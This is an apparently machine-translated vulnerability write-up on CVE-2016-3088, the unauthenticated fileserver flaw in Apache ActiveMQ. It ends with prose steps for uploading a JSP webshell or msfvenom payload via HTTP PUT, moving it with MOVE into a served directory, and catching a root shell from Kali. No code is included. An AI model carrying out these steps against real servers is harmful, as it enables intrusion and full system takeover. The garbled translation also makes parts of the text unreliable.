1. Vulnerability background:
ActiveMQ is an open source under the Apache Software Foundation message driven middleware software. Jetty is an open source servlet container that is Java-based web container, such as JSP and servlet to provide operating environment. ActiveMQ 5.0 and later default integrated jetty. After starting a Web application monitoring ActiveMQ.
April 14, 2016, foreign security researcher Simon Zuckerbraun exposure multiple security vulnerabilities Apache ActiveMQ Fileserver, *** who can replace remote Web applications with malicious code, remote code execution on an affected system (CVE-2016- 3088).
8161 port for the web console port, this loophole will appear in the web console.
ActiveMQ web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, fileserver is the interface to store files; admin api and need to use login, fileserver without logging in.
fileserver is a RESTful API interface, we can read and write files stored therein by the operation GET, PUT, DELETE HTTP requests, etc., which is designed to compensate for the defect can not transmit the message queue operations, store binary files, but later found: the utilization rate is not high and prone to file operation vulnerability.
So, ActiveMQ in 5.12.x ~ 5.13.x version has been turned off by default fileserver this application (you can conf / jetty.xml in the open); after the 5.14.0 version, completely remove the fileserver applications.
2. exploit:
First Jsp a PUT to the fileserver directory Webshell 
added below is generated in a jsp *** (msfvenom generated payload) 
is then moved using the MOVE method Webshell admin / directory (relative path may also be used) 
time visit http: // your ip: 8161 / api / find your *** already exists. 
Then kali monitor, perform on the website, you can get root privileges.